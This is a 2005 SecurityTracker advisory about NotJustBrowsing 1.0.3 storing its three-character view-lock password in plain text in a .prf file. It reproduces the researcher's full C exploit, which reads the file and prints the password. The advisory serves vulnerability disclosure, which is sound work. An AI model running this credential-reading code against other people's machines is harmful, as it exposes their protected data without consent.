SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Browser)  >   NotJustBrowsing Vendors:   NetLeaf Limited
NotJustBrowsing Discloses Application Password to Local Users
SecurityTracker Alert ID:  1013826
SecurityTracker URL:  http://securitytracker.com/id/1013826
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 28 2005
Impact:   Disclosure of authentication information
Exploit Included:  Yes  
Version(s): 1.0.3
Description:   Kozan reported a vulnerability in NotJustBrowsing. A local user can obtain an application password.

The application stores the three character 'View Lock Password' in the '\\Program Files\NetLeaf Limited\NotJustBrowsing\notjustbrowsing.prf' file in plain text format. A local user can view the file to obtain the password.

Impact:   A local user can obtain the 'View Local Password' value.
Solution:   No solution was available at the time of this entry.
Vendor URL:  notjustbrowsing.com/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  NotJustBrowsing 1.0.3 discloses passwords to local users.


---------------------
Application:
---------------------

NotJustBrowsing 1.0.3

---------------------
Introduction:
---------------------

Vendor: www.NotJustBrowsing.com

Vendor Description: Drag and drop for visited links collection. Browsing
signals represented in color codes. View multiple pages in tiled-windows,
in a layout of your choice. Configurable visual representation for group
of URL links. Add notes with stored links. Share multiple Web links with
other users. Pop-ups blocking. Publish user guides, manuals, and help
contents. View lock: protect your stored Web links from being visited by
someone else. Protection: not let any body else modify your stored Web page
links. The ability to have multiple home pages. Each home position can be a
single document link or multiple documents collection. History as a collection
of ‘typed’ and ‘linked’ visits. Version 1.0.3 includes
configurable visual
representation for group of URL links (called ‘front cover’)

---------------------
Bug:
---------------------

NotJustBrowsing 1.0.3 stores "View Lock Password" (this is a three characters
pass.)
in "\\Program Files\NetLeaf Limited\NotJustBrowsing\notjustbrowsing.prf"
in plain text format without crypting and can be viewed by a local user
with a hex editor.

"notjustbrowsing.prf" password storing algorithm:

5. byte = 1. char of password
6. byte = 2. char of password
7. byte = 3. char of password

---------------------
Vendor Confirmed:
---------------------

No.

---------------------
Fix:
---------------------

There is no solution at the time of this entry.

---------------------
Exploit:
---------------------


/*****************************************************************

NotJustBrowsing 1.0.3 Local Password Disclosure Exploit by Kozan

Application: NotJustBrowsing 1.0.3
Procuder: www.notjustbrowsing.com
Vulnerable Description: NotJustBrowsing 1.0.3 discloses passwords
to local users.

Discovered & Coded by Kozan
Credits to ATmaCA
www.netmagister.com - www.spyinstructors.com
kozan@netmagister.com

*****************************************************************/

#include <stdio.h>
#include <windows.h>


HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;


char *bilgi_oku(int adres,int uzunluk)
{
	if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
					"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
					0,
					KEY_QUERY_VALUE,
					&hKey
					) == ERROR_SUCCESS)
	{

	lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,(LPBYTE) prgfiles,
&dwBufLen);
	if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
	{
		RegCloseKey(hKey);
		return NULL;
	}
	RegCloseKey(hKey);

	strcat(prgfiles,"\\NetLeaf Limited\\NotJustBrowsing\\notjustbrowsing.prf");

	int i;
	FILE *fp;
	char ch[100];
	if((fp=fopen(prgfiles,"rb")) == NULL)
	{
		return "NOTINSTALLED";
	}
	fseek(fp,adres,0);
	for(i=0;i<uzunluk;i++)
	ch[i]=getc(fp);
	ch[i]=NULL;
	fclose(fp);
	return ch;
	}
}

int main()
{
	printf("NotJustBrowsing 1.0.3 Local Password Disclosure Exploit by Kozan\n");
	printf("Credits to ATmaCA\n");
	printf("www.netmagister.com - www.spyinstructors.com\n");
	printf("kozan@netmagister.com\n\n");
	if(bilgi_oku(4,3)==NULL)
	{
		printf("An error occured!\n");
		return -1;
	}
	if(bilgi_oku(4,3)=="NOTINSTALLED")
	{
		printf("NotJustBrowsing 1.0.3 is not installed on your system!\n");
		return -1;
	}
	printf("View Lock Password: %s",bilgi_oku(4,3));
	return 0;
}




Kozan...
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC